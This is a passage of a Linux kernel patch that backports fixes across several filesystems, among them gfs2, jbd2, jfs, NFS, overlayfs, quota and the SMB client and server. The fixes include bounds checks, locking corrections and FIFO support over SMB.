+ 		set_sbi_flag(F2FS_I_SB(inode), SBI_NEED_FSCK);
+ 		error = -EFSCORRUPTED;
+diff --git a/fs/gfs2/inode.c b/fs/gfs2/inode.c
+index 04a201584fa7c..23e6962cdd6e3 100644
+--- a/fs/gfs2/inode.c
++++ b/fs/gfs2/inode.c
+@@ -1845,16 +1845,24 @@ out:
+ int gfs2_permission(struct user_namespace *mnt_userns, struct inode *inode,
+ 		    int mask)
+ {
++	int may_not_block = mask & MAY_NOT_BLOCK;
+ 	struct gfs2_inode *ip;
+ 	struct gfs2_holder i_gh;
++	struct gfs2_glock *gl;
+ 	int error;
+ 
+ 	gfs2_holder_mark_uninitialized(&i_gh);
+ 	ip = GFS2_I(inode);
+-	if (gfs2_glock_is_locked_by_me(ip->i_gl) == NULL) {
+-		if (mask & MAY_NOT_BLOCK)
++	gl = rcu_dereference_check(ip->i_gl, !may_not_block);
++	if (unlikely(!gl)) {
++		/* inode is getting torn down, must be RCU mode */
++		WARN_ON_ONCE(!may_not_block);
++		return -ECHILD;
++        }
++	if (gfs2_glock_is_locked_by_me(gl) == NULL) {
++		if (may_not_block)
+ 			return -ECHILD;
+-		error = gfs2_glock_nq_init(ip->i_gl, LM_ST_SHARED, LM_FLAG_ANY, &i_gh);
++		error = gfs2_glock_nq_init(gl, LM_ST_SHARED, LM_FLAG_ANY, &i_gh);
+ 		if (error)
+ 			return error;
+ 	}
+diff --git a/fs/gfs2/quota.c b/fs/gfs2/quota.c
+index 1ed17226d9ede..86bc73bd770b4 100644
+--- a/fs/gfs2/quota.c
++++ b/fs/gfs2/quota.c
+@@ -438,6 +438,17 @@ static int qd_check_sync(struct gfs2_sbd *sdp, struct gfs2_quota_data *qd,
+ 	    (sync_gen && (qd->qd_sync_gen >= *sync_gen)))
+ 		return 0;
+ 
++	/*
++	 * If qd_change is 0 it means a pending quota change was negated.
++	 * We should not sync it, but we still have a qd reference and slot
++	 * reference taken by gfs2_quota_change -> do_qc that need to be put.
++	 */
++	if (!qd->qd_change && test_and_clear_bit(QDF_CHANGE, &qd->qd_flags)) {
++		slot_put(qd);
++		qd_put(qd);
++		return 0;
++	}
++
+ 	if (!lockref_get_not_dead(&qd->qd_lockref))
+ 		return 0;
+ 
+diff --git a/fs/gfs2/super.c b/fs/gfs2/super.c
+index 44c564f0bc622..302d1e43d7012 100644
+--- a/fs/gfs2/super.c
++++ b/fs/gfs2/super.c
+@@ -1435,7 +1435,7 @@ out:
+ 		wait_on_bit_io(&ip->i_flags, GIF_GLOP_PENDING, TASK_UNINTERRUPTIBLE);
+ 		gfs2_glock_add_to_lru(ip->i_gl);
+ 		gfs2_glock_put_eventually(ip->i_gl);
+-		ip->i_gl = NULL;
++		rcu_assign_pointer(ip->i_gl, NULL);
+ 	}
+ }
+ 
+diff --git a/fs/inode.c b/fs/inode.c
+index 6ae760db13116..73ad1b0d47758 100644
+--- a/fs/inode.c
++++ b/fs/inode.c
+@@ -2501,6 +2501,22 @@ struct timespec64 current_time(struct inode *inode)
+ }
+ EXPORT_SYMBOL(current_time);
+ 
++/**
++ * inode_set_ctime_current - set the ctime to current_time
++ * @inode: inode
++ *
++ * Set the inode->i_ctime to the current value for the inode. Returns
++ * the current value that was assigned to i_ctime.
++ */
++struct timespec64 inode_set_ctime_current(struct inode *inode)
++{
++	struct timespec64 now = current_time(inode);
++
++	inode_set_ctime(inode, now.tv_sec, now.tv_nsec);
++	return now;
++}
++EXPORT_SYMBOL(inode_set_ctime_current);
++
+ /**
+  * in_group_or_capable - check whether caller is CAP_FSETID privileged
+  * @mnt_userns: user namespace of the mount @inode was found from
+diff --git a/fs/jbd2/recovery.c b/fs/jbd2/recovery.c
+index 357a3f7632e39..2426b89f1576f 100644
+--- a/fs/jbd2/recovery.c
++++ b/fs/jbd2/recovery.c
+@@ -288,6 +288,8 @@ int jbd2_journal_recover(journal_t *journal)
+ 	journal_superblock_t *	sb;
+ 
+ 	struct recovery_info	info;
++	errseq_t		wb_err;
++	struct address_space	*mapping;
+ 
+ 	memset(&info, 0, sizeof(info));
+ 	sb = journal->j_superblock;
+@@ -305,6 +307,9 @@ int jbd2_journal_recover(journal_t *journal)
+ 		return 0;
+ 	}
+ 
++	wb_err = 0;
++	mapping = journal->j_fs_dev->bd_inode->i_mapping;
++	errseq_check_and_advance(&mapping->wb_err, &wb_err);
+ 	err = do_one_pass(journal, &info, PASS_SCAN);
+ 	if (!err)
+ 		err = do_one_pass(journal, &info, PASS_REVOKE);
+@@ -323,6 +328,9 @@ int jbd2_journal_recover(journal_t *journal)
+ 
+ 	jbd2_journal_clear_revoke(journal);
+ 	err2 = sync_blockdev(journal->j_fs_dev);
++	if (!err)
++		err = err2;
++	err2 = errseq_check_and_advance(&mapping->wb_err, &wb_err);
+ 	if (!err)
+ 		err = err2;
+ 	/* Make sure all replayed data is on permanent storage */
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index e9d075cbd71ad..4d56f6081a5d2 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -87,7 +87,7 @@ static int dbAllocCtl(struct bmap * bmp, s64 nblocks, int l2nb, s64 blkno,
+ static int dbExtend(struct inode *ip, s64 blkno, s64 nblocks, s64 addnblocks);
+ static int dbFindBits(u32 word, int l2nb);
+ static int dbFindCtl(struct bmap * bmp, int l2nb, int level, s64 * blkno);
+-static int dbFindLeaf(dmtree_t * tp, int l2nb, int *leafidx);
++static int dbFindLeaf(dmtree_t *tp, int l2nb, int *leafidx, bool is_ctl);
+ static int dbFreeBits(struct bmap * bmp, struct dmap * dp, s64 blkno,
+ 		      int nblocks);
+ static int dbFreeDmap(struct bmap * bmp, struct dmap * dp, s64 blkno,
+@@ -180,7 +180,8 @@ int dbMount(struct inode *ipbmap)
+ 	bmp->db_nfree = le64_to_cpu(dbmp_le->dn_nfree);
+ 
+ 	bmp->db_l2nbperpage = le32_to_cpu(dbmp_le->dn_l2nbperpage);
+-	if (bmp->db_l2nbperpage > L2PSIZE - L2MINBLOCKSIZE) {
++	if (bmp->db_l2nbperpage > L2PSIZE - L2MINBLOCKSIZE ||
++		bmp->db_l2nbperpage < 0) {
+ 		err = -EINVAL;
+ 		goto err_release_metapage;
+ 	}
+@@ -194,6 +195,12 @@ int dbMount(struct inode *ipbmap)
+ 	bmp->db_maxlevel = le32_to_cpu(dbmp_le->dn_maxlevel);
+ 	bmp->db_maxag = le32_to_cpu(dbmp_le->dn_maxag);
+ 	bmp->db_agpref = le32_to_cpu(dbmp_le->dn_agpref);
++	if (bmp->db_maxag >= MAXAG || bmp->db_maxag < 0 ||
++		bmp->db_agpref >= MAXAG || bmp->db_agpref < 0) {
++		err = -EINVAL;
++		goto err_release_metapage;
++	}
++
+ 	bmp->db_aglevel = le32_to_cpu(dbmp_le->dn_aglevel);
+ 	bmp->db_agheight = le32_to_cpu(dbmp_le->dn_agheight);
+ 	bmp->db_agwidth = le32_to_cpu(dbmp_le->dn_agwidth);
+@@ -1710,7 +1717,7 @@ static int dbFindCtl(struct bmap * bmp, int l2nb, int level, s64 * blkno)
+ 		 * dbFindLeaf() returns the index of the leaf at which
+ 		 * free space was found.
+ 		 */
+-		rc = dbFindLeaf((dmtree_t *) dcp, l2nb, &leafidx);
++		rc = dbFindLeaf((dmtree_t *) dcp, l2nb, &leafidx, true);
+ 
+ 		/* release the buffer.
+ 		 */
+@@ -1957,7 +1964,7 @@ dbAllocDmapLev(struct bmap * bmp,
+ 	 * free space.  if sufficient free space is found, dbFindLeaf()
+ 	 * returns the index of the leaf at which free space was found.
+ 	 */
+-	if (dbFindLeaf((dmtree_t *) & dp->tree, l2nb, &leafidx))
++	if (dbFindLeaf((dmtree_t *) &dp->tree, l2nb, &leafidx, false))
+ 		return -ENOSPC;
+ 
+ 	if (leafidx < 0)
+@@ -2921,14 +2928,18 @@ static void dbAdjTree(dmtree_t * tp, int leafno, int newval)
+  *	leafidx	- return pointer to be set to the index of the leaf
+  *		  describing at least l2nb free blocks if sufficient
+  *		  free blocks are found.
++ *	is_ctl	- determines if the tree is of type ctl
+  *
+  * RETURN VALUES:
+  *	0	- success
+  *	-ENOSPC	- insufficient free blocks.
+  */
+-static int dbFindLeaf(dmtree_t * tp, int l2nb, int *leafidx)
++static int dbFindLeaf(dmtree_t *tp, int l2nb, int *leafidx, bool is_ctl)
+ {
+ 	int ti, n = 0, k, x = 0;
++	int max_size;
++
++	max_size = is_ctl ? CTLTREESIZE : TREESIZE;
+ 
+ 	/* first check the root of the tree to see if there is
+ 	 * sufficient free space.
+@@ -2949,6 +2960,8 @@ static int dbFindLeaf(dmtree_t * tp, int l2nb, int *leafidx)
+ 			/* sufficient free space found.  move to the next
+ 			 * level (or quit if this is the last level).
+ 			 */
++			if (x + n > max_size)
++				return -ENOSPC;
+ 			if (l2nb <= tp->dmt_stree[x + n])
+ 				break;
+ 		}
+diff --git a/fs/jfs/jfs_imap.c b/fs/jfs/jfs_imap.c
+index 4899663996d81..6ed2e1d4c894f 100644
+--- a/fs/jfs/jfs_imap.c
++++ b/fs/jfs/jfs_imap.c
+@@ -1320,7 +1320,7 @@ diInitInode(struct inode *ip, int iagno, int ino, int extno, struct iag * iagp)
+ int diAlloc(struct inode *pip, bool dir, struct inode *ip)
+ {
+ 	int rc, ino, iagno, addext, extno, bitno, sword;
+-	int nwords, rem, i, agno;
++	int nwords, rem, i, agno, dn_numag;
+ 	u32 mask, inosmap, extsmap;
+ 	struct inode *ipimap;
+ 	struct metapage *mp;
+@@ -1356,6 +1356,9 @@ int diAlloc(struct inode *pip, bool dir, struct inode *ip)
+ 
+ 	/* get the ag number of this iag */
+ 	agno = BLKTOAG(JFS_IP(pip)->agstart, JFS_SBI(pip->i_sb));
++	dn_numag = JFS_SBI(pip->i_sb)->bmap->db_numag;
++	if (agno < 0 || agno > dn_numag)
++		return -EIO;
+ 
+ 	if (atomic_read(&JFS_SBI(pip->i_sb)->bmap->db_active[agno])) {
+ 		/*
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 5cf53def987e5..85a952143e9fb 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -5628,7 +5628,7 @@ static void nfs4_proc_write_setup(struct nfs_pgio_header *hdr,
+ 
+ 	msg->rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_WRITE];
+ 	nfs4_init_sequence(&hdr->args.seq_args, &hdr->res.seq_res, 0, 0);
+-	nfs4_state_protect_write(server->nfs_client, clnt, msg, hdr);
++	nfs4_state_protect_write(hdr->ds_clp ? hdr->ds_clp : server->nfs_client, clnt, msg, hdr);
+ }
+ 
+ static void nfs4_proc_commit_rpc_prepare(struct rpc_task *task, struct nfs_commit_data *data)
+@@ -5669,7 +5669,8 @@ static void nfs4_proc_commit_setup(struct nfs_commit_data *data, struct rpc_mess
+ 	data->res.server = server;
+ 	msg->rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_COMMIT];
+ 	nfs4_init_sequence(&data->args.seq_args, &data->res.seq_res, 1, 0);
+-	nfs4_state_protect(server->nfs_client, NFS_SP4_MACH_CRED_COMMIT, clnt, msg);
++	nfs4_state_protect(data->ds_clp ? data->ds_clp : server->nfs_client,
++			NFS_SP4_MACH_CRED_COMMIT, clnt, msg);
+ }
+ 
+ static int _nfs4_proc_commit(struct file *dst, struct nfs_commitargs *args,
+@@ -8939,6 +8940,7 @@ void nfs4_test_session_trunk(struct rpc_clnt *clnt, struct rpc_xprt *xprt,
+ 
+ 	sp4_how = (adata->clp->cl_sp4_flags == 0 ? SP4_NONE : SP4_MACH_CRED);
+ 
++try_again:
+ 	/* Test connection for session trunking. Async exchange_id call */
+ 	task = nfs4_run_exchange_id(adata->clp, adata->cred, sp4_how, xprt);
+ 	if (IS_ERR(task))
+@@ -8951,11 +8953,15 @@ void nfs4_test_session_trunk(struct rpc_clnt *clnt, struct rpc_xprt *xprt,
+ 
+ 	if (status == 0)
+ 		rpc_clnt_xprt_switch_add_xprt(clnt, xprt);
+-	else if (rpc_clnt_xprt_switch_has_addr(clnt,
++	else if (status != -NFS4ERR_DELAY && rpc_clnt_xprt_switch_has_addr(clnt,
+ 				(struct sockaddr *)&xprt->addr))
+ 		rpc_clnt_xprt_switch_remove_xprt(clnt, xprt);
+ 
+ 	rpc_put_task(task);
++	if (status == -NFS4ERR_DELAY) {
++		ssleep(1);
++		goto try_again;
++	}
+ }
+ EXPORT_SYMBOL_GPL(nfs4_test_session_trunk);
+ 
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index 96714e105d7bf..faecdbfa01a29 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -2799,7 +2799,7 @@ static int client_opens_release(struct inode *inode, struct file *file)
+ 
+ 	/* XXX: alternatively, we could get/drop in seq start/stop */
+ 	drop_client(clp);
+-	return 0;
++	return seq_release(inode, file);
+ }
+ 
+ static const struct file_operations client_states_fops = {
+diff --git a/fs/overlayfs/super.c b/fs/overlayfs/super.c
+index 08d3a1f34ac6c..51eec4a8e82b2 100644
+--- a/fs/overlayfs/super.c
++++ b/fs/overlayfs/super.c
+@@ -2155,7 +2155,7 @@ static int ovl_fill_super(struct super_block *sb, void *data, int silent)
+ 		ovl_trusted_xattr_handlers;
+ 	sb->s_fs_info = ofs;
+ 	sb->s_flags |= SB_POSIXACL;
+-	sb->s_iflags |= SB_I_SKIP_SYNC | SB_I_IMA_UNVERIFIABLE_SIGNATURE;
++	sb->s_iflags |= SB_I_SKIP_SYNC;
+ 
+ 	err = -ENOMEM;
+ 	root_dentry = ovl_get_root(sb, upperpath.dentry, oe);
+diff --git a/fs/proc/proc_sysctl.c b/fs/proc/proc_sysctl.c
+index 72f2b373221ed..4a4c04a3b1a0a 100644
+--- a/fs/proc/proc_sysctl.c
++++ b/fs/proc/proc_sysctl.c
+@@ -1814,7 +1814,6 @@ static const struct sysctl_alias sysctl_aliases[] = {
+ 	{"hung_task_panic",			"kernel.hung_task_panic" },
+ 	{"numa_zonelist_order",			"vm.numa_zonelist_order" },
+ 	{"softlockup_all_cpu_backtrace",	"kernel.softlockup_all_cpu_backtrace" },
+-	{"softlockup_panic",			"kernel.softlockup_panic" },
+ 	{ }
+ };
+ 
+@@ -1830,6 +1829,13 @@ static const char *sysctl_find_alias(char *param)
+ 	return NULL;
+ }
+ 
++bool sysctl_is_alias(char *param)
++{
++	const char *alias = sysctl_find_alias(param);
++
++	return alias != NULL;
++}
++
+ /* Set sysctl value passed on kernel command line. */
+ static int process_sysctl_arg(char *param, char *val,
+ 			       const char *unused, void *arg)
+diff --git a/fs/quota/dquot.c b/fs/quota/dquot.c
+index f26ddfcaa5e61..b0cf3869d3bf5 100644
+--- a/fs/quota/dquot.c
++++ b/fs/quota/dquot.c
+@@ -2403,6 +2403,20 @@ static int vfs_setup_quota_inode(struct inode *inode, int type)
+ 	if (sb_has_quota_loaded(sb, type))
+ 		return -EBUSY;
+ 
++	/*
++	 * Quota files should never be encrypted.  They should be thought of as
++	 * filesystem metadata, not user data.  New-style internal quota files
++	 * cannot be encrypted by users anyway, but old-style external quota
++	 * files could potentially be incorrectly created in an encrypted
++	 * directory, hence this explicit check.  Some reasons why encrypted
++	 * quota files don't work include: (1) some filesystems that support
++	 * encryption don't handle it in their quota_read and quota_write, and
++	 * (2) cleaning up encrypted quota files at unmount would need special
++	 * consideration, as quota files are cleaned up later than user files.
++	 */
++	if (IS_ENCRYPTED(inode))
++		return -EINVAL;
++
+ 	dqopt->files[type] = igrab(inode);
+ 	if (!dqopt->files[type])
+ 		return -EIO;
+diff --git a/fs/smb/client/cifs_debug.c b/fs/smb/client/cifs_debug.c
+index e41154ad96afc..ed396b186c5a4 100644
+--- a/fs/smb/client/cifs_debug.c
++++ b/fs/smb/client/cifs_debug.c
+@@ -380,6 +380,11 @@ skip_rdma:
+ 		seq_printf(m, "\n\n\tSessions: ");
+ 		i = 0;
+ 		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++			spin_lock(&ses->ses_lock);
++			if (ses->ses_status == SES_EXITING) {
++				spin_unlock(&ses->ses_lock);
++				continue;
++			}
+ 			i++;
+ 			if ((ses->serverDomain == NULL) ||
+ 				(ses->serverOS == NULL) ||
+@@ -400,6 +405,7 @@ skip_rdma:
+ 				ses->ses_count, ses->serverOS, ses->serverNOS,
+ 				ses->capabilities, ses->ses_status);
+ 			}
++			spin_unlock(&ses->ses_lock);
+ 
+ 			seq_printf(m, "\n\tSecurity type: %s ",
+ 				get_security_type_str(server->ops->select_sectype(server, ses->sectype)));
+diff --git a/fs/smb/client/cifs_spnego.c b/fs/smb/client/cifs_spnego.c
+index 342717bf1dc28..1e6819daaaa7e 100644
+--- a/fs/smb/client/cifs_spnego.c
++++ b/fs/smb/client/cifs_spnego.c
+@@ -64,8 +64,8 @@ struct key_type cifs_spnego_key_type = {
+  * strlen(";sec=ntlmsspi") */
+ #define MAX_MECH_STR_LEN	13
+ 
+-/* strlen of "host=" */
+-#define HOST_KEY_LEN		5
++/* strlen of ";host=" */
++#define HOST_KEY_LEN		6
+ 
+ /* strlen of ";ip4=" or ";ip6=" */
+ #define IP_KEY_LEN		5
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 18d66497c42d1..33ea1440f4b06 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -1186,6 +1186,7 @@ const char *cifs_get_link(struct dentry *dentry, struct inode *inode,
+ 
+ const struct inode_operations cifs_symlink_inode_ops = {
+ 	.get_link = cifs_get_link,
++	.setattr = cifs_setattr,
+ 	.permission = cifs_permission,
+ 	.listxattr = cifs_listxattr,
+ };
+diff --git a/fs/smb/client/cifspdu.h b/fs/smb/client/cifspdu.h
+index cc458b98441c7..c403816d0b6c1 100644
+--- a/fs/smb/client/cifspdu.h
++++ b/fs/smb/client/cifspdu.h
+@@ -2570,7 +2570,7 @@ typedef struct {
+ 
+ 
+ struct win_dev {
+-	unsigned char type[8]; /* IntxCHR or IntxBLK */
++	unsigned char type[8]; /* IntxCHR or IntxBLK or LnxFIFO*/
+ 	__le64 major;
+ 	__le64 minor;
+ } __attribute__((packed));
+diff --git a/fs/smb/client/cifsproto.h b/fs/smb/client/cifsproto.h
+index a914b88ca51a1..f37e4da0fe405 100644
+--- a/fs/smb/client/cifsproto.h
++++ b/fs/smb/client/cifsproto.h
+@@ -79,7 +79,7 @@ extern char *cifs_compose_mount_options(const char *sb_mountdata,
+ 		const char *fullpath, const struct dfs_info3_param *ref,
+ 		char **devname);
+ extern void delete_mid(struct mid_q_entry *mid);
+-extern void release_mid(struct mid_q_entry *mid);
++void __release_mid(struct kref *refcount);
+ extern void cifs_wake_up_task(struct mid_q_entry *mid);
+ extern int cifs_handle_standard(struct TCP_Server_Info *server,
+ 				struct mid_q_entry *mid);
+@@ -694,4 +694,9 @@ struct super_block *cifs_get_tcon_super(struct cifs_tcon *tcon);
+ void cifs_put_tcon_super(struct super_block *sb);
+ int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry);
+ 
++static inline void release_mid(struct mid_q_entry *mid)
++{
++	kref_put(&mid->refcount, __release_mid);
++}
++
+ #endif			/* _CIFSPROTO_H */
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index acb8951eb7576..6ca1e00b3f76a 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -205,13 +205,14 @@ cifs_signal_cifsd_for_reconnect(struct TCP_Server_Info *server,
+ 	/* If server is a channel, select the primary channel */
+ 	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+ 
+-	spin_lock(&pserver->srv_lock);
++	/* if we need to signal just this channel */
+ 	if (!all_channels) {
+-		pserver->tcpStatus = CifsNeedReconnect;
+-		spin_unlock(&pserver->srv_lock);
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus != CifsExiting)
++			server->tcpStatus = CifsNeedReconnect;
++		spin_unlock(&server->srv_lock);
+ 		return;
+ 	}
+-	spin_unlock(&pserver->srv_lock);
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+@@ -4204,8 +4205,12 @@ cifs_setup_session(const unsigned int xid, struct cifs_ses *ses,
+ 	is_binding = !CIFS_ALL_CHANS_NEED_RECONNECT(ses);
+ 	spin_unlock(&ses->chan_lock);
+ 
+-	if (!is_binding)
++	if (!is_binding) {
+ 		ses->ses_status = SES_IN_SETUP;
++
++		/* force iface_list refresh */
++		ses->iface_last_update = 0;
++	}
+ 	spin_unlock(&ses->ses_lock);
+ 
+ 	/* update ses ip_addr only for primary chan */
+diff --git a/fs/smb/client/inode.c b/fs/smb/client/inode.c
+index 9531ea2430899..05516309ec3ab 100644
+--- a/fs/smb/client/inode.c
++++ b/fs/smb/client/inode.c
+@@ -567,6 +567,10 @@ cifs_sfu_type(struct cifs_fattr *fattr, const char *path,
+ 			cifs_dbg(FYI, "Symlink\n");
+ 			fattr->cf_mode |= S_IFLNK;
+ 			fattr->cf_dtype = DT_LNK;
++		} else if (memcmp("LnxFIFO", pbuf, 8) == 0) {
++			cifs_dbg(FYI, "FIFO\n");
++			fattr->cf_mode |= S_IFIFO;
++			fattr->cf_dtype = DT_FIFO;
+ 		} else {
+ 			fattr->cf_mode |= S_IFREG; /* file? */
+ 			fattr->cf_dtype = DT_REG;
+diff --git a/fs/smb/client/sess.c b/fs/smb/client/sess.c
+index 1e3e22979604f..f0d164873500b 100644
+--- a/fs/smb/client/sess.c
++++ b/fs/smb/client/sess.c
+@@ -186,7 +186,6 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 	}
+ 
+ 	if (!(server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
+-		ses->chan_max = 1;
+ 		spin_unlock(&ses->chan_lock);
+ 		cifs_server_dbg(VFS, "no multichannel support\n");
+ 		return 0;
+diff --git a/fs/smb/client/smb2misc.c b/fs/smb/client/smb2misc.c
+index 572293c18e16f..eaa5bd148810a 100644
+--- a/fs/smb/client/smb2misc.c
++++ b/fs/smb/client/smb2misc.c
+@@ -787,7 +787,7 @@ __smb2_handle_cancelled_cmd(struct cifs_tcon *tcon, __u16 cmd, __u64 mid,
+ {
+ 	struct close_cancelled_open *cancelled;
+ 
+-	cancelled = kzalloc(sizeof(*cancelled), GFP_ATOMIC);
++	cancelled = kzalloc(sizeof(*cancelled), GFP_KERNEL);
+ 	if (!cancelled)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index efff7137412b4..2c1898803279a 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -5215,7 +5215,7 @@ smb2_make_node(unsigned int xid, struct inode *inode,
+ 	 * over SMB2/SMB3 and Samba will do this with SMB3.1.1 POSIX Extensions
+ 	 */
+ 
+-	if (!S_ISCHR(mode) && !S_ISBLK(mode))
++	if (!S_ISCHR(mode) && !S_ISBLK(mode) && !S_ISFIFO(mode))
+ 		return rc;
+ 
+ 	cifs_dbg(FYI, "sfu compat create special file\n");
+@@ -5263,6 +5263,12 @@ smb2_make_node(unsigned int xid, struct inode *inode,
+ 		pdev->minor = cpu_to_le64(MINOR(dev));
+ 		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
+ 							&bytes_written, iov, 1);
++	} else if (S_ISFIFO(mode)) {
++		memcpy(pdev->type, "LnxFIFO", 8);
++		pdev->major = 0;
++		pdev->minor = 0;
++		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
++							&bytes_written, iov, 1);
+ 	}
+ 	tcon->ses->server->ops->close(xid, tcon, &fid);
+ 	d_drop(dentry);
+diff --git a/fs/smb/client/smb2transport.c b/fs/smb/client/smb2transport.c
+index 22954a9c7a6c7..69dbd08fd4419 100644
+--- a/fs/smb/client/smb2transport.c
++++ b/fs/smb/client/smb2transport.c
+@@ -451,6 +451,8 @@ generate_smb3signingkey(struct cifs_ses *ses,
+ 				  ptriplet->encryption.context,
+ 				  ses->smb3encryptionkey,
+ 				  SMB3_ENC_DEC_KEY_SIZE);
++		if (rc)
++			return rc;
+ 		rc = generate_key(ses, ptriplet->decryption.label,
+ 				  ptriplet->decryption.context,
+ 				  ses->smb3decryptionkey,
+@@ -459,9 +461,6 @@ generate_smb3signingkey(struct cifs_ses *ses,
+ 			return rc;
+ 	}
+ 
+-	if (rc)
+-		return rc;
+-
+ #ifdef CONFIG_CIFS_DEBUG_DUMP_KEYS
+ 	cifs_dbg(VFS, "%s: dumping generated AES session keys\n", __func__);
+ 	/*
+diff --git a/fs/smb/client/transport.c b/fs/smb/client/transport.c
+index 87aea456ee903..8a1dd8407a3a7 100644
+--- a/fs/smb/client/transport.c
++++ b/fs/smb/client/transport.c
+@@ -76,7 +76,7 @@ alloc_mid(const struct smb_hdr *smb_buffer, struct TCP_Server_Info *server)
+ 	return temp;
+ }
+ 
+-static void __release_mid(struct kref *refcount)
++void __release_mid(struct kref *refcount)
+ {
+ 	struct mid_q_entry *midEntry =
+ 			container_of(refcount, struct mid_q_entry, refcount);
+@@ -156,15 +156,6 @@ static void __release_mid(struct kref *refcount)
+ 	mempool_free(midEntry, cifs_mid_poolp);
+ }
+ 
+-void release_mid(struct mid_q_entry *mid)
+-{
+-	struct TCP_Server_Info *server = mid->server;
+-
+-	spin_lock(&server->mid_lock);
+-	kref_put(&mid->refcount, __release_mid);
+-	spin_unlock(&server->mid_lock);
+-}
+-
+ void
+ delete_mid(struct mid_q_entry *mid)
+ {
+diff --git a/fs/smb/client/xattr.c b/fs/smb/client/xattr.c
+index 998fa51f9b684..786b4f6e1263a 100644
+--- a/fs/smb/client/xattr.c
++++ b/fs/smb/client/xattr.c
+@@ -150,10 +150,13 @@ static int cifs_xattr_set(const struct xattr_handler *handler,
+ 		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
+ 			goto out;
+ 
+-		if (pTcon->ses->server->ops->set_EA)
++		if (pTcon->ses->server->ops->set_EA) {
+ 			rc = pTcon->ses->server->ops->set_EA(xid, pTcon,
+ 				full_path, name, value, (__u16)size,
+ 				cifs_sb->local_nls, cifs_sb);
++			if (rc == 0)
++				inode_set_ctime_current(inode);
++		}
+ 		break;
+ 
+ 	case XATTR_CIFS_ACL:
+diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
+index a4421d9458d90..adc41b57b84c6 100644
+--- a/fs/smb/server/smb_common.c
++++ b/fs/smb/server/smb_common.c
+@@ -372,11 +372,22 @@ static int smb1_allocate_rsp_buf(struct ksmbd_work *work)
+ 	return 0;
+ }
+ 
++/**
++ * set_smb1_rsp_status() - set error type in smb response header
++ * @work:	smb work containing smb response header
++ * @err:	error code to set in response
++ */
++static void set_smb1_rsp_status(struct ksmbd_work *work, __le32 err)
++{
++	work->send_no_response = 1;
++}
++
+ static struct smb_version_ops smb1_server_ops = {
+ 	.get_cmd_val = get_smb1_cmd_val,
+ 	.init_rsp_hdr = init_smb1_rsp_hdr,
+ 	.allocate_rsp_buf = smb1_allocate_rsp_buf,
+ 	.check_user_session = smb1_check_user_session,
++	.set_rsp_status = set_smb1_rsp_status,
+ };
+ 
+ static int smb1_negotiate(struct ksmbd_work *work)
+diff --git a/fs/smb/server/smbacl.c b/fs/smb/server/smbacl.c
+index b05ff9b146b55..c24df86eb112b 100644
+--- a/fs/smb/server/smbacl.c
++++ b/fs/smb/server/smbacl.c
+@@ -1107,6 +1107,7 @@ pass:
+ 		struct smb_acl *pdacl;
+ 		struct smb_sid *powner_sid = NULL, *pgroup_sid = NULL;
+ 		int powner_sid_size = 0, pgroup_sid_size = 0, pntsd_size;
++		int pntsd_alloc_size;
+ 
+ 		if (parent_pntsd->osidoffset) {
+ 			powner_sid = (struct smb_sid *)((char *)parent_pntsd +
+@@ -1119,9 +1120,10 @@ pass:
+ 			pgroup_sid_size = 1 + 1 + 6 + (pgroup_sid->num_subauth * 4);
+ 		}
+ 
+-		pntsd = kzalloc(sizeof(struct smb_ntsd) + powner_sid_size +
+-				pgroup_sid_size + sizeof(struct smb_acl) +
+-				nt_size, GFP_KERNEL);
++		pntsd_alloc_size = sizeof(struct smb_ntsd) + powner_sid_size +
++			pgroup_sid_size + sizeof(struct smb_acl) + nt_size;
++
++		pntsd = kzalloc(pntsd_alloc_size, GFP_KERNEL);
+ 		if (!pntsd) {
+ 			rc = -ENOMEM;
+ 			goto free_aces_base;
+@@ -1136,6 +1138,27 @@ pass:
+ 		pntsd->gsidoffset = parent_pntsd->gsidoffset;
+ 		pntsd->dacloffset = parent_pntsd->dacloffset;
+ 
++		if ((u64)le32_to_cpu(pntsd->osidoffset) + powner_sid_size >
++		    pntsd_alloc_size) {
++			rc = -EINVAL;
++			kfree(pntsd);
++			goto free_aces_base;
++		}
++
++		if ((u64)le32_to_cpu(pntsd->gsidoffset) + pgroup_sid_size >
++		    pntsd_alloc_size) {
++			rc = -EINVAL;
++			kfree(pntsd);
++			goto free_aces_base;
++		}
++
++		if ((u64)le32_to_cpu(pntsd->dacloffset) + sizeof(struct smb_acl) + nt_size >
++		    pntsd_alloc_size) {
++			rc = -EINVAL;
++			kfree(pntsd);
++			goto free_aces_base;
++		}
++
+ 		if (pntsd->osidoffset) {
+ 			struct smb_sid *owner_sid = (struct smb_sid *)((char *)pntsd +
+ 					le32_to_cpu(pntsd->osidoffset));
